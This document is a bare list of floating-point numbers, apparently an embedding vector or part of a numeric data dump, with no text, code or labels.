-0.02280830405652523, 0.007858186028897762, 0.01048301625996828, -0.0003275942581240088, 0.00976567156612873, 0.025058157742023468, -0.006643590983003378, 0.011624246835708618, 0.0006108639645390213, 0.0076706986874341965, -0.008428801782429218, -0.009659700095653534, 0.002529048128053546, 0.013474670238792896, 0.037856243550777435, -0.0014071777695789933, 0.03658458590507507, -0.024569060653448105, 0.023949535563588142, -0.010988418012857437, 0.0017464900156483054, 0.0182596854865551, -0.0017322247149422765, 0.018553145229816437, -0.025710290297865868, -0.0032402791548520327, 0.0021092381794005632, 0.01621362380683422, -0.025628773495554924, -0.0052781905978918076, -0.011004721745848656, -0.021471435204148293, -0.01760755479335785, 0.004255158826708794, -0.004789091646671295, -0.020379113033413887, 0.0007417997694574296, 0.0070837801322340965, 0.010238466784358025, 0.04160599783062935, -0.023509345948696136, -0.008388043381273746, 0.0009945007041096687, -0.01178727950900793, -0.020542146638035774, -0.00494804885238409, 0.016392959281802177, -0.008396195247769356, -0.003967813681811094, -0.0010688845068216324, -0.014558838680386543, -0.009504818357527256, -0.00020137112005613744, 0.013654006645083427, -0.011868796311318874, -0.005632787011563778, 0.0061463406309485435, 0.007731835823506117, -0.013515428639948368, 0.04030173644423485, 0.02383541129529476, 0.009203207679092884, -0.03076430968940258, 0.027731897309422493, 0.004532314836978912, -0.006215629633516073, -0.011550881899893284, -0.00886083859950304, 0.02021608129143715, 0.00398207874968648, 0.010898750275373459, -0.0352151095867157, -0.025628773495554924, -0.01380888745188713, -0.00840434618294239, -0.009667851962149143, 0.012855145148932934, -0.011982918716967106, 0.0065050129778683186, -0.0002662021724972874, 0.0238680187612772, -0.02398214116692543, 0.013393153436481953, 0.02227029576897621, 0.01995522901415825, 0.016555992886424065, -0.008901597000658512, -0.028759006410837173, 0.01486045029014349, 0.02880791574716568, -0.02200944349169731, 0.00609743082895875, 0.021292097866535187, -0.004012647550553083, 0.011534578166902065, 0.010670503601431847, 0.0048624565824866295, 0.00801306776702404, -0.034465156495571136, 0.014289834536612034, -0.00291421334259212, 0.007503589615225792, -0.004544542636722326, 0.014110498130321503, 0.0262156929820776, 0.009243966080248356, 0.007283495273441076, -0.005877336487174034, -0.008567379787564278, 0.001249239663593471, -0.037627995014190674, 0.00854292418807745, 0.004809470847249031, 0.00778889749199152, -0.005738758482038975, 0.0027837869711220264, 0.03570420667529106, 0.008510317653417587, -0.02085191011428833, -0.008000840432941914, -0.00645202724263072, 0.002987578045576811, 0.010906902141869068, 0.0060240658931434155, 0.0189118180423975, -0.002164261881262064, -0.003853690344840288, 0.00020799433696083724, -0.008950507268309593, 0.005632787011563778, 0.018031440675258636, -0.010417803190648556, -0.0002639095182530582, -0.003696771338582039, 0.02111276239156723, -0.0029651611112058163, 0.014355047605931759, 0.022319205105304718, 0.004850229248404503, -0.017167365178465843, -0.0017220351146534085, -0.016409263014793396, -0.01878139190375805, -0.026900431141257286, -0.02383541129529476, 0.003884259145706892, -0.0037497570738196373, 0.0021561102475970984, 0.037627995014190674, 0.004768712446093559, -0.007776669692248106, 0.010507470928132534, 0.009464060887694359, 0.006419420707970858, -0.03153056651353836, -0.01290405448526144, -0.011493820697069168, 0.0031995209865272045, -0.0001995879429159686, 0.009235814213752747, 0.0008248446392826736, 0.010906902141869068, 0.03893226012587547, 0.013849645853042603, 0.005327100399881601, 0.005710227880626917, 0.011004721745848656, -0.016197320073843002, 0.023525649681687355, -0.016164712607860565, -0.015561491250991821, -0.0003449165087658912, -0.01669456996023655, -0.0014245000202208757, 0.020036743953824043, 0.004079898819327354, -0.006912595592439175, -0.004247007425874472, -0.004483405034989119, -0.027308013290166855, 0.008551076054573059, 0.004063595086336136, 0.014249076135456562, -0.01323012076318264, 0.018569448962807655, -0.025221191346645355, -0.033063072711229324, 0.02308546006679535, -0.005824350751936436, 0.0021520345471799374, 0.005799895618110895, 0.004063595086336136, 0.010238466784358025, -0.0038292354438453913, -0.03179141879081726, -0.0031322697177529335, 0.021585557609796524, -0.015047937631607056, -0.0027471045032143593, -0.018569448962807655, -0.02411256730556488, 0.003270847722887993, -0.017623858526349068, -0.02006935141980648, -0.028074268251657486, -0.0060159144923090935, -0.0007591220200993121, 0.01636035181581974, 0.03423691168427467, 0.0070267184637486935, 0.010580835863947868, -0.005290417931973934, 0.014901207759976387, 0.004613831173628569, 0.0005828426801599562, -0.0033951604273170233, -0.008917899802327156, -0.00005047014929004945, 0.02109645865857601, -0.01879769377410412, 0.01538215484470129, 0.012439411133527756, 0.021324705332517624, -0.004450798500329256, 0.023949535563588142, -0.003358477959409356, 0.012333439663052559, -0.027063462883234024, 0.006855533923953772, 0.019205277785658836, 0.010287377052009106, -0.004202173091471195, -0.005347479600459337, -0.010328134521842003, 0.0036478613037616014, -0.008163873106241226, -0.0002735895977821201, -0.02502555213868618, 0.008208706974983215, 0.017542341724038124, -0.009390695951879025, -0.0061667198315262794, 0.004679044708609581, 0.027862325310707092, 0.012455714866518974, 0.007739987690001726, 0.00014150746574159712, 0.010662352666258812, 0.005885487888008356, 0.007943778298795223, -0.020281294360756874, 0.002645208965986967, 0.009064629673957825, -0.0019095229217782617, 0.012366046197712421, 0.032394640147686005, -0.022319205105304718, -0.01930309645831585, -0.0017383383819833398, -0.006700652651488781, 0.003209710353985429, -0.020623663440346718, 0.005486057605594397, 0.009537424892187119, 0.010124343447387218, 0.013026329688727856, -0.011061782948672771, -0.016841299831867218, 0.004214400891214609, -0.005771365016698837, -0.011950312182307243, 0.005995535291731358, -0.0008564322488382459, 0.00333809875883162, -0.003898524446412921, -0.022596361115574837, -0.011493820697069168, -0.0014102347195148468, 0.017314095050096512, 0.0021459206473082304, -0.010703111067414284, 0.0004794186679646373, -0.0017067508306354284, 0.012618747539818287, -0.00931733101606369, 0.006350131705403328, -0.015007179230451584, 0.010385196655988693, 0.020134564489126205, 0.00805790163576603, -0.0043692821636796, -0.02528640441596508, -0.024291904643177986, -0.002073574811220169, 0.013613248243927956, -0.003554117400199175, 0.007866337895393372, 0.004088050220161676, -0.00795600563287735, -0.037073682993650436, 0.0011717990273609757, -0.0015386231243610382, 0.019515039399266243, -0.01061344239860773, 0.006566150579601526, -0.015178363770246506, -0.005282266531139612, -0.00824538990855217, -0.0121948616579175, 0.011290028691291809, -0.004895063117146492, -0.03115558996796608, -0.0006154492148198187, 0.00037726835580542684, 0.021194279193878174, 0.009252117946743965, -0.015496278181672096, 0.015879405662417412, -0.005396389402449131, 0.000041426916141062975, 0.01589570939540863, -0.014884904958307743, 0.01636035181581974, 0.029362227767705917, 0.00846140831708908, 0.011591640301048756, 0.0071775238029658794, 0.009341785684227943, 0.004813546780496836, 0.004752409178763628, 0.002123503712937236, 0.0007922380464151502, -0.008396195247769356, -0.008139418438076973, 0.006346056237816811, -0.008029370568692684, -0.0008625459740869701, 0.0182596854865551, 0.035280320793390274, 0.02176489308476448, -0.0021927927155047655, -0.02502555213868618, 0.0029345923103392124, 0.006174871698021889, 0.005123309325426817, -0.01265135407447815, 0.004691272042691708, -0.02098233625292778, 0.0002944782027043402, 0.017167365178465843, -0.013996375724673271, 0.005367858801037073, -0.006961505394428968, -0.02763407863676548, -0.016776086762547493, -0.027014553546905518, -0.029003554955124855, 0.03164468705654144, 0.004181794356554747, 0.007112310733646154, -0.018455324694514275, 0.0010444296058267355, -0.020884515717625618, 0.015757130458950996, 0.010344438254833221, 0.005877336487174034, -0.015178363770246506, -0.0020409682765603065, 0.015153909102082253, -0.01530879084020853, -0.007104159332811832, 0.008310602977871895, 0.012439411133527756, -0.011420455761253834, 0.0179988332092762, -0.00939884688705206, -0.012480169534683228, -0.03167729452252388, 0.008534773252904415, 0.016906512901186943, -0.0063093737699091434, 0.014868601225316525, -0.005575725343078375, 0.010792778804898262, -0.002143882680684328, -0.04134514555335045, 0.0035357761662453413, -0.0023843562230467796, 0.0002837791689671576, 0.003356439992785454, 0.03987785056233406, -0.01493381429463625, 0.011901402845978737, 0.027927538380026817, 0.00341961532831192, -0.021047549322247505, 0.012015525251626968, 0.007405770011246204, -0.009464060887694359, 0.001901371288113296, 0.009072781540453434, -0.027862325310707092, 0.002594261197373271, 0.0036132168024778366, 0.013010025955736637, 0.01147751696407795, 0.0029508958104997873, 0.002938668243587017, 0.01578158512711525, 0.005547194741666317, -0.0036030274350196123, -0.014509929344058037, -0.003802742576226592, -0.019091153517365456, -0.008526621386408806, -0.0025759199634194374, 0.01824338361620903, 0.004630134906619787, 0.011550881899893284, 0.009830884635448456, -0.0023680529557168484, 0.01928679272532463, 0.008665199391543865, 0.018406415358185768, -0.01511315070092678, 0.03298155963420868, 0.013621400110423565, 0.01812925934791565, -0.0005945606390014291, 0.007206054870039225, -0.0224333293735981, 0.025058157742023468, -0.005119233392179012, -0.005261887330561876, 0.012129648588597775, -0.008917899802327156, -0.015871254727244377, -0.002406773390248418, 0.018292292952537537, 0.005869184620678425, -0.0013124148827046156, -0.00020226270135026425, -0.012154103256762028, -0.009879793971776962, 0.00030797935323789716, -0.010466712526977062, -0.0005548213957808912, -0.003058905014768243, -0.0022885745856910944, -0.004414116032421589, 0.0007326291524805129, -0.0033401367254555225, -0.003823121776804328, -0.03164468705654144, -0.014974572695791721, 0.008163873106241226, 0.009969462640583515, 0.0011830076109617949, 0.014224621467292309, -0.012692112475633621, 0.031074073165655136, -0.003146535251289606, 0.006957429461181164, 0.002049119910225272, 0.007992688566446304, -0.022792000323534012, 0.02253114804625511, -0.0026431709993630648, 0.022449631243944168, 0.014175711199641228, -0.0051559158600866795, -0.016498930752277374, -0.008901597000658512, 0.003352364292368293, 0.005416768603026867, -0.0041349222883582115, 0.013670309446752071, 0.013156755827367306, 0.0012502586469054222, 0.0035357761662453413, 0.0010923205409199, -0.0206073597073555, -0.02841663733124733, -0.011396000161767006, 0.012741021811962128, -0.01649077981710434, 0.0023558256216347218, -0.009252117946743965, 0.026248298585414886, 0.019726982340216637, 0.015186515636742115, -0.011950312182307243, -0.000028689972168649547, -0.0025412754621356726, -0.01166500523686409, -0.01147751696407795, -0.009113539941608906, 0.006362359505146742, 0.01466481015086174, -0.006859609857201576, -0.004389661364257336, -0.024552756920456886, -0.007479134947061539, 0.00804159790277481, -0.044507984071969986, 0.014632203616201878, -0.004960276186466217, 0.017281489446759224, -0.0013409457169473171, 0.010271073319017887, 0.015235425904393196, 0.007560651283711195, 0.033160895109176636, 0.022726787254214287, -0.008624440990388393, -0.0027532184030860662, -0.008559227921068668, -0.006631363648921251, 0.023802805691957474, 0.012154103256762028, 0.007727759890258312, 0.01309154275804758, 0.01695542223751545, 0.0037395674735307693, -0.011510123498737812, -0.004617907106876373, -0.012292681261897087, 0.016906512901186943, -0.00859998632222414, -0.0078092762269079685, 0.010002069175243378, 0.020020442083477974, 0.017933620139956474, -0.015129454433918, 0.027422135695815086, -0.0179988332092762, -0.016824996098876, -0.004055443685501814, -0.01146936509758234, 0.006403117440640926, -0.00945590902119875, -0.0012472018133848906, -0.005689848680049181, 0.005987383890897036, -0.0013490973506122828, 0.01472187228500843, 0.021014941856265068, 0.020949728786945343, -0.01574897952377796, -0.009806429967284203, 0.01191770564764738, -0.0031730281189084053, -0.02657436393201351, -0.005816198885440826, 0.0030670566484332085, 0.005058096256107092, 0.000021541360183618963, -0.007483210414648056, 0.005445299204438925, 0.0018229117849841714, -0.002948857843875885, -0.0014336706371977925, 0.002357863588258624, 0.001942129572853446, 0.007295722607523203, 0.01811295561492443, 0.024944035336375237, -0.0039168656803667545, -0.006460179109126329, 0.014599597081542015, -0.014257228001952171, 0.008754867129027843, -0.01466481015086174, -0.0030874358490109444, -0.017705373466014862, 0.0035785723011940718, 0.00511108199134469, -0.000991443870589137, 0.009227662347257137, 0.006631363648921251, 0.012300833128392696, -0.011591640301048756, 0.011420455761253834, -0.009105388075113297, 0.010825385339558125, 0.00038007047260180116, -0.012887751683592796, -0.019726982340216637, -0.022906124591827393, -0.016988029703497887, -0.01904224418103695, -0.015007179230451584, -0.01850423589348793, -0.002993691945448518, 0.0022580057848244905, 0.008388043381273746, -0.005343403667211533, 0.024079961702227592, -0.0013317750999704003, -0.012007374316453934, -0.0037395674735307693, -0.0101732537150383, 0.017379308119416237, -0.01075202040374279, -0.01062159426510334, -0.0036743541713804007, 0.01563485711812973, 0.0101732537150383, 0.003065018681809306, 0.01979219540953636, -0.012993723154067993, -0.004287765361368656, 0.025857020169496536, 0.00079886126331985, -0.006382738705724478, 0.0031546868849545717, 0.0002845433773472905, -0.003464449429884553, 0.016205471009016037, 0.007748139090836048, 0.015162060968577862, -0.021699680015444756, -0.010833537206053734, 0.007780745625495911, -0.011249271221458912, 0.016034286469221115, -0.01786840707063675, -0.0025310858618468046, -0.013596944510936737, -0.02176489308476448, 0.0037089986726641655, -0.0026737398002296686, -0.010809081606566906, -0.0003979021857958287, -0.02165077067911625, 0.002987578045576811, -0.03166099265217781, 0.00567354541271925, 0.013874100521206856, 0.003990230616182089, -0.013890404254198074, 0.023134369403123856, -0.0055064368061721325, -0.03268809989094734, -0.013344244100153446, 0.021210581064224243, -0.01394746545702219, 0.003321795491501689, -0.027846021577715874, 0.01605874113738537, 0.00043254668707959354, 0.020884515717625618, 0.0099124014377594, 0.010931356810033321, 0.004487480968236923, -0.0013287182664498687, -0.0050703235901892185, 0.013156755827367306, -0.020802998915314674, 0.010515622794628143, 0.00912984274327755, 0.006794396787881851, 0.014200166799128056, -0.006774017587304115, -0.017770586535334587, -0.002665588166564703, -0.012871447950601578, 0.010646048933267593, -0.013279031030833721, -0.010417803190648556, -0.0015712296590209007, -0.002584071597084403, 0.010646048933267593, 0.024161476641893387, -0.004626058973371983, -0.003175065852701664, 0.009993917308747768, -0.012855145148932934, 0.042584195733070374, 0.013050784356892109, 0.00703894579783082, 0.001132059725932777, 0.009227662347257137, 0.001389855518937111, 0.008917899802327156, -0.004931745585054159, -0.008779322728514671, -0.0072997985407710075, -0.013890404254198074, 0.006394966039806604, 0.005861033219844103, 0.005861033219844103, -0.013083390891551971, 0.014485473744571209, 0.0017872483003884554, -0.00262075406499207, -0.004312220495194197, -0.004434495232999325, 0.0034970559645444155, -0.011363393627107143, -0.006468330975621939, -0.006240084767341614, -0.005583877209573984, 0.008811929263174534, 0.005172219127416611, 0.010287377052009106, -0.0018769163871183991, 0.011510123498737812, -0.0023700909223407507, -0.011624246835708618, -0.02474839612841606, 0.000513044185936451, -0.011404152028262615, 0.012276378460228443, 0.010319983586668968, 0.016743479296565056, 0.009195055812597275, -0.02122688479721546, -0.011632397770881653, -0.0023599013220518827, 0.004483405034989119, 0.007862262427806854, 0.013148603960871696, 0.013605096377432346, -0.027829717844724655, -0.00007476587779819965, -0.011224815621972084, 0.0058080474846065044, 0.019775891676545143, 0.013923010788857937, -0.0020949728786945343, -0.004740181844681501, -0.00802121963351965, -0.009651548229157925, 0.0010913015576079488, 0.0027144979685544968, 0.007316101808100939, 0.005922170355916023, -0.0182596854865551, -0.00413696002215147, -0.0037701360415667295, -0.016824996098876, -0.017509734258055687, -0.022596361115574837, 0.007356860209256411, -0.007022642530500889, 0.013865948654711246, 0.0013674385845661163, -0.004422267898917198, -0.023509345948696136, 0.022726787254214287, -0.005359706934541464, 0.0072427368722856045, -0.007544348016381264, 0.0010352589888498187, 0.006317525170743465, -0.003356439992785454, 0.01016510184854269, 0.00645202724263072, 0.008061977103352547, -0.008926051668822765, 0.012822538614273071, -0.004340751096606255, -0.0006011838559061289, -0.028335120528936386, 0.02111276239156723, -0.01589570939540863, 0.012455714866518974, -0.013075239956378937, 0.00009438076813239604, -0.024226689711213112, -0.01914006471633911, 0.005999611224979162, 0.007976384833455086, 0.004980655387043953, 0.010214012116193771, -0.006456103175878525, -0.01296926848590374, 0.024308206513524055, -0.0017485279822722077, 0.01760755479335785, 0.008893445134162903, -0.03439994528889656, -0.002573881996795535, 0.0049928827211260796, -0.0035133592318743467, -0.003833311377093196, 0.008110887371003628, -0.0015834571095183492, -0.005021413788199425, 0.0031587625853717327, -0.005318948533385992, -0.0012461828300729394, -0.02150404080748558, 0.008795625530183315, 0.03378041833639145, 0.013376850634813309, 0.009879793971776962, 0.001815779018215835, 0.004442646633833647, -0.0007703304872848094, -0.005881412420421839, -0.019058547914028168, -0.0020796884782612324, 0.011412303894758224, -0.0007000225596129894, -0.001825968618504703, 0.008844535797834396, -0.015186515636742115, 0.009969462640583515, -0.01798252947628498, -0.021177975460886955, -0.001425519003532827, -0.0063745868392288685, 0.0121948616579175, 0.007287571206688881, 0.004206249024719, -0.0004875703016296029, -0.00553496740758419, -0.00582842668518424, 0.00796415749937296, -0.01265135407447815, -0.01061344239860773, 0.009643396362662315, -0.015431065112352371, -0.006211553700268269, -0.009749367833137512, 0.0025677683297544718, 0.007079704198986292, 0.012349743396043777, -0.0017067508306354284, 0.005229280795902014, 0.010531926527619362, -0.007307950407266617, -0.005204825662076473, -0.020933425053954124, 0.018210776150226593, -0.0009211359429173172, -0.007365011610090733, -0.0032300895545631647, 0.03164468705654144, -0.014640355482697487, 0.018406415358185768, 0.006341980304569006, 0.0022539300844073296, 0.01218670979142189, 0.030454548075795174, 0.015920164063572884, -0.0002541020803619176, -0.006904443725943565, 0.011290028691291809, -0.0070063392631709576, -0.0026166781317442656, -0.010849840007722378, -0.008575530722737312, 0.03009587526321411, -0.0028041661716997623, 0.006280842702835798, -0.009089085273444653, 0.01049116812646389, 0.02711237408220768, 0.016857603564858437, 0.017933620139956474, -0.002300801919773221, -0.019335703924298286, 0.017770586535334587, 0.014363199472427368, 0.016392959281802177, 0.0011524389265105128, -0.004483405034989119, 0.0253027081489563, -0.002357863588258624, 0.001026088371872902, 0.018308596685528755, -0.007711456622928381, -0.016596751287579536, 0.0010862067574635148, -0.0093254828825593, 0.0013001874322071671, 0.002543313428759575, 0.0052985697984695435, 0.006782168988138437, 0.003069094615057111, -0.001775020849891007, 0.0006862666341476142, 0.0017363005317747593, 0.02815578319132328, -0.017770586535334587, 0.003009995212778449, -0.008428801782429218, -0.0013562300009652972, 0.0027593320701271296, -0.011958464048802853, -0.03632373362779617, -0.008159797638654709, 0.0012013487285003066, -0.0033992361277341843, -0.0043529788963496685, -0.02044432796537876, -0.033046770840883255, 0.03184032812714577, -0.00668434938415885, 0.018161866813898087, -0.016197320073843002, -0.01296111661940813, 0.004198097623884678, 0.011640549637377262, 0.009871643036603928, 0.00290198577567935, 0.0030935495160520077, -0.024063657969236374, -0.01524357683956623, 0.002113314112648368, -0.006509088911116123, -0.0017118455143645406, -0.010385196655988693, 0.0264765452593565, -0.004638286307454109, -0.014974572695791721, 0.013327940367162228, -0.014868601225316525, 0.019890015944838524, 0.004157339222729206, 0.018618358299136162, 0.0013246424496173859, -0.003242317121475935, -0.0272591020911932, -0.000015268415154423565, 0.00501733785495162, 0.0004656627424992621, -0.0032280515879392624, 0.014909359626471996, 0.022351812571287155, 0.003853690344840288, 0.01115145068615675, -0.00769515335559845, -0.012480169534683228, 0.0057224552147090435, 0.012871447950601578, 0.0009247022680938244, -0.014118649996817112, -0.009733065031468868, -0.0031730281189084053, -0.008155721239745617, 0.004935821518301964, -0.013735522516071796, -0.007499514147639275, -0.011306332424283028, -0.01265135407447815, 0.014004526659846306, 0.002310991520062089, 0.017428217455744743, 0.018569448962807655, -0.03299786150455475, 0.019612859934568405, -0.0104341059923172, 0.0020205890759825706, 0.010189556516706944, -0.01121666468679905, 0.004520087502896786, 0.02070518024265766, 0.01093950867652893, -0.0036234064027667046, 0.005624635610729456, -0.01786840707063675, -0.01479523628950119, 0.009415150620043278, -0.005681696813553572, -0.007870413362979889, 0.0065539232455194, 0.009162449277937412, 0.004405964631587267, -0.010564533062279224, 0.0037701360415667295, 0.010002069175243378, 0.009676002897322178, 0.01866726763546467, 0.01866726763546467, -0.006207478232681751, -0.0014438602374866605, -0.006284918636083603, -0.012357894331216812, 0.015903860330581665, 0.007136765867471695, -0.00713268993422389, -0.010849840007722378, 0.012276378460228443, 0.036551978439092636, -0.02357455901801586, 0.003666202537715435, 0.018341202288866043, 0.023297403007745743, -0.003711036639288068, 0.0017841914668679237, 0.011363393627107143, 0.0030915115494281054, 0.006089279428124428, -0.006443875841796398, -0.002457721158862114, 0.004727954510599375, -0.007634016219526529, -0.006399041973054409, 0.024096263572573662, 0.018993334844708443, -0.025596167892217636, -0.01667826622724533, 0.023819107562303543, 0.01465665828436613, 0.018960727378726006, 0.017020635306835175, -0.0056368629448115826, -0.0241288710385561, -0.0003472091630101204, 0.022922426462173462, 0.004764636978507042, 0.002771559404209256, -0.0010434106225147843, 0.019482433795928955, -0.008184252306818962, -0.009822732768952847, -0.0065050129778683186, -0.014730023220181465, 0.005689848680049181, -0.013735522516071796, 0.0023171051871031523, -0.003028336213901639, -0.005323024466633797, -0.0037599464412778616, -0.015863101929426193, 0.02996544912457466, 0.0036437856033444405, 0.003849614644423127, 0.0067251077853143215, -0.001978812040761113, 0.01408604346215725, 0.0065539232455194, -0.017314095050096512, -0.009602638892829418, 0.004030988551676273, 0.012284530326724052, 0.0011106616584584117, -0.007254964672029018, -0.0200856551527977, -0.020183473825454712, -0.010670503601431847, -0.016384808346629143, -0.006879989057779312, 0.02776450477540493, 0.02228659950196743, 0.033421747386455536, -0.004147149622440338, -0.013605096377432346, -0.01576528325676918, 0.014461019076406956, -0.011232967488467693, -0.004878759849816561, -0.006802548188716173, -0.019221579656004906, 0.0071489932015538216, -0.0015253766905516386, -0.00038261787267401814, 0.01048301625996828, -0.00010049450793303549, 0.010817233473062515, -0.0034114636946469545, -0.015047937631607056, 0.010580835863947868, 0.00654577137902379, -0.007417997345328331, 0.007055249065160751, 0.0044181919656693935, -0.01609949953854084, -0.041638605296611786, -0.011371545493602753, -0.004573073238134384, 0.004373357631266117, -0.0027430288027971983, -0.002235588850453496, -0.003413501661270857, 0.007193827070295811, 0.008355436846613884, -0.016107652336359024, 0.012154103256762028, 0.0035276245325803757, -0.007731835823506117, -0.017705373466014862, 0.0029407062102109194, 0.006048521026968956, 0.0015080544399097562, -0.013768129050731659, -0.001578362425789237, -0.010156949982047081, 0.012895903550088406, 0.010703111067414284, 0.0011157564586028457, 0.01232528779655695, 0.01876508817076683, 0.00827392004430294, -0.0073853908106684685, 0.008657047525048256, -0.010124343447387218, 0.011012873612344265, -0.005848805885761976, -0.018080350011587143, 0.0047116512432694435, 0.009781974367797375, 0.01615656167268753, 0.017933620139956474, -0.02399844489991665, -0.020656269043684006, 0.0022926502861082554, -0.021357310935854912, -0.0070185670629143715, -0.0031648764852434397, 0.004597527906298637, 0.004422267898917198, -0.005037717055529356, -0.00971676129847765, 0.0035317004658281803, 0.011550881899893284, 0.009724913164973259, 0.011591640301048756, 0.01679239049553871, 0.008697805926203728, -0.004000420216470957, 0.0250418558716774, 0.02280830405652523, 0.015887556597590446, 0.004071746952831745, 0.011893250979483128, -0.0030915115494281054, -0.024976642802357674, -0.001836158218793571, 0.017297791317105293, 0.000990424887277186, -0.01498272456228733, 0.007780745625495911, -0.028351422399282455, 0.006284918636083603, 0.024226689711213112, -0.02163446694612503, 0.008950507268309593, -0.012031828984618187, 0.0014948080061003566, -0.019058547914028168, 0.015056089498102665, -0.003372743260115385, 0.011314484290778637, -0.0033156818244606256, -0.024194084107875824, 0.007116386666893959, 0.0037599464412778616, 0.0037497570738196373, -0.014159408397972584, -0.016384808346629143, 0.04287765547633171, 0.006105582695454359, -0.002310991520062089, -0.0017505658324807882, 0.006427572574466467, -0.027324315160512924, -0.005575725343078375, -0.003044639714062214, -0.02686782367527485, -0.0039943065494298935, 0.007564727216959, -0.007043021731078625, 0.025221191346645355, -0.005225204862654209, 0.014232773333787918, -0.012806234881281853, -0.011273725889623165, -0.0016680305125191808, 0.012610595673322678, -0.0022783849854022264, 0.021830106154084206, -0.00831875391304493, 0.007389466743916273, -0.0021051624789834023, -0.00013010790280532092, 0.02476469986140728, -0.0046464381739497185, -0.004536390770226717, 0.007197903003543615, -0.011004721745848656, -0.021145367994904518, -0.003788477275520563, 0.010083585977554321, -0.006851457990705967, -0.009757519699633121, 0.0013745712349191308, 0.00846140831708908, 0.017428217455744743, -0.00551051227375865, -0.03177511319518089, -0.0006108639645390213, 0.014338744804263115, 0.0071489932015538216, -0.009260269813239574, -0.005009185988456011, 0.02280830405652523, 0.006888140458613634, -0.01499087642878294, 0.00007648536120541394, 0.012675808742642403, 0.00016112237062770873, -0.0139556173235178, -0.008689654059708118, -0.012765477411448956, 0.018047742545604706, -0.01824338361620903, -0.004707575310021639, 0.003933168947696686, 0.0042103249579668045, 0.031465351581573486, 0.000050533835747046396, 0.007267192006111145, -0.0050132619217038155, -0.0009221549262292683, 0.003368667559698224, 0.028318816795945168, 0.011518275365233421, 0.0051559158600866795, 0.016001680865883827, -0.01466481015086174, -0.018064046278595924, -0.006256388034671545, -0.008763018995523453, 0.013026329688727856, 0.011102541349828243, 0.01179543137550354, -0.013645854778587818, 0.023900624364614487, 0.002488289726898074, -0.010703111067414284, 0.011705762706696987, 0.013385001569986343, 0.01760755479335785, 0.0009094179840758443, 0.013971920125186443, 0.02476469986140728, 0.010646048933267593, 0.0027287632692605257, 0.011713914573192596, -0.02880791574716568, -0.002357863588258624, 0.004308144561946392, -0.016164712607860565, -0.012276378460228443, 0.0012329363962635398, -0.01336054690182209, -0.015031634829938412, -0.007034870330244303, -0.0017016560304909945, 0.03485643491148949, 0.008371739648282528, 0.015977226197719574, 0.00814349390566349, -0.00553496740758419, -0.0004949577269144356, 0.008673351258039474, 0.021601861342787743, 0.00674548652023077, -0.02072148211300373, -0.012080738320946693, 0.006945202127099037, -0.004952124785631895, -0.0182596854865551, -0.025612469762563705, -0.010580835863947868, 0.0133686987683177, -0.010580835863947868, 0.0116079431027174, 0.003270847722887993, -0.012838841415941715, 0.013849645853042603, 0.0093254828825593, -0.024797305464744568, 0.014689265750348568, 0.009806429967284203, -0.0057876682840287685, -0.0071775238029658794, 0.018699875101447105, 0.039030078798532486, 0.0024291903246194124, 0.014827843755483627, -0.0020287407096475363, 0.025873323902487755, -0.01159979123622179, 0.0012828651815652847, -0.012977419421076775, 0.0014295948203653097, -0.013450215570628643, -0.0007555556367151439, -0.013482822105288506, 0.008616289123892784, -0.008583682589232922, 0.0033808948937803507, 0.004098239820450544, 0.0026227920316159725, 0.01706954650580883, -0.02200944349169731, 0.01798252947628498, -0.0101732537150383, 0.007010415196418762, 0.002194830682128668, 0.01556964311748743, -0.0014031019527465105, -0.018047742545604706, 0.013376850634813309, 0.007548423949629068, -0.011722066439688206, 0.02502555213868618, 0.005090702790766954, 0.009659700095653534, -0.018031440675258636, 0.003393122460693121, -0.026003750041127205, 0.0029671990778297186, -0.0035113212652504444, 0.007943778298795223, -0.016311442479491234, 0.024063657969236374, 0.010262921452522278, -0.017770586535334587, 0.0028225071728229523, -0.03140014037489891, 0.03586724027991295, -0.014787085354328156, 0.004173642490059137, -0.004234780091792345, 0.006557998713105917, -0.006174871698021889, -0.007189751602709293, 0.0002977898111566901, 0.003160800551995635, 0.013735522516071796, 0.006831078790128231, 0.012039980851113796, 0.006052596960216761, 0.024585362523794174, 0.014289834536612034, 0.008559227921068668, -0.0020287407096475363, 0.01650708168745041, -0.00229672621935606, -0.023770198225975037, -0.006419420707970858, 0.00229672621935606, 0.009292876347899437, 0.028710095211863518, 0.013800735585391521, 0.01692281663417816, -0.0040595196187496185, -0.02425929717719555, 0.006313449703156948, -0.014974572695791721, -0.01030367985367775, 0.002645208965986967, 0.02776450477540493, 0.0068147755227983, 0.010246618650853634, 0.008159797638654709, 0.0011840264778584242, -0.014159408397972584, -0.0044181919656693935, -0.0025779579300433397, -0.0003286132123321295, -0.006077051628381014, 0.037856243550777435, -0.014053436927497387, 0.012137800455093384, 0.011355242691934109, 0.0003981569316238165, -0.017819497734308243, -0.0013215854996815324, 0.026688488200306892, 0.007866337895393372, 0.016091348603367805, 0.011982918716967106, -0.0007066457765176892, 0.0007713494705967605, -0.001274713547900319, 0.013026329688727856, 0.012553534470498562, 0.003641747636720538, -0.006985960062593222, -0.005583877209573984, 0.003857766278088093, 0.01030367985367775, 0.0073201777413487434, -0.010311831720173359, -0.013001875020563602, 0.004073784686625004, 0.006945202127099037, 0.020672572776675224, -0.020786697044968605, -0.006513164844363928, -0.014746326953172684, -0.012431259267032146, 0.0006429610657505691, -0.04962721839547157, 0.021536648273468018, 0.0005802952800877392, -0.004609755706042051, -0.019515039399266243, -0.0110210245475173, -0.0052985697984695435, 0.0024556831922382116, -0.012211165390908718, -0.012227468192577362, 0.009032023139297962, -0.0010423916392028332, 0.0007677831454202533, -0.015471823513507843, 0.00788264162838459, -0.023411525413393974, -0.007104159332811832, -0.0003533228882588446, -0.002484214026480913, 0.013874100521206856, -0.007519892882555723, 0.0030874358490109444, -0.024324510246515274, 0.022971337661147118, 0.0010250693885609508, 0.0003444070171099156, -0.008379891514778137, 0.01427353173494339, 0.002447531558573246, -0.009015720337629318, -0.002669663866981864, 0.0008258635643869638, -0.002630943665280938, -0.005119233392179012, -0.02059105597436428, 0.005567573942244053, -0.003986154682934284, 0.0024556831922382116, 0.001618101610802114, -0.002740990836173296, 0.00683923065662384, -0.016596751287579536, -0.006419420707970858, 0.004605679772794247, 0.0029570094775408506, 0.005127385258674622, 0.020819302648305893, 0.005889563821256161, -0.020656269043684006, 0.007222358137369156, -0.01736300438642502, 0.00778889749199152, -0.010833537206053734, -0.01479523628950119, -0.0027532184030860662, -0.016441868618130684, -0.006851457990705967, 0.022449631243944168, 0.025987446308135986, -0.011591640301048756, 0.01467296201735735, 0.0033625538926571608, -0.016262533143162727, 0.016988029703497887, 0.006741411052644253, -0.0004768712678924203, 0.008591834455728531, -0.008917899802327156, 0.019188974052667618, 0.007483210414648056, 0.0062319329008460045, 